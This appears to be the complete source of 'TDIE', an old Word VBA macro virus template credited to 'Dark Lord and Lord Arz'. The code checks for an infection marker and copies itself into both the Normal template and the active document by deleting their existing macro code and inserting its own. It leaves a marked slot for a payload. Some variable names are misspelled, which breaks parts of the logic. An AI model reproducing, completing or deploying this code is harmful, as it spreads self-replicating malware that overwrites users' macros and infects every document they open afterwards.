REM BEGINN TDIE
'TDIE	by Dark Lord and Lord Arz
'Please don't remove this Sing
NormInstalled = False
ActInstalled = False

NormalTemplate.VBProject.VBComponents(1).export ("c:\Normal.bas")
ActiveDocument.VBProject.VBComponents(1).export ("c:\Document.bas")

NI = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(2, 1)
AI = ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(2, 1)

If UCase(NI) = "REM BEGINN TDIE" Then NormInstalled = True
If UCase(AI) = "REM BEGINN TDIE" Then ActInstalled = True

If NormInstalled = True And ActIntalled = True Then GoTo PayLoad

If NormInstalled = True Then IW = "c:\Normal.bas" Else IW = "C:\Document.bas"
Open IW For Input As #1
VirCode = "Private Sub Document_Open()" & Chr(13)
Do
Line Input #1, SRCLine
Loop Until SRCLine = "Private Sub Document_Open()"
Do Until SRCLine = "End Sub"
Line Input #1, SRCLine
If SCRLine = "REM End TDIE" Then Exit Do
VirCode = VirCode & SRCLine & Chr(13)
Loop

VirCode = VirCode & SRCLine & Chr(13)
VirCode = VirCode & "End Sub"

If NormInstalled = False Then
Lines = NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines
NormalTemplate.VBProject.VBComponents(1).CodeModule.deletelines 1, Lines
NormalTemplate.VBProject.VBComponents(1).CodeModule.InsertLines 1, VirCode
End If
If ActInstalled = False Then
Lines = ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines
ActiveDocument.VBProject.VBComponents(1).CodeModule.deletelines 1, Lines
ActiveDocument.VBProject.VBComponents(1).CodeModule.InsertLines 1, VirCode
End If
PayLoad:
'Insert Payload here
REM End TDIE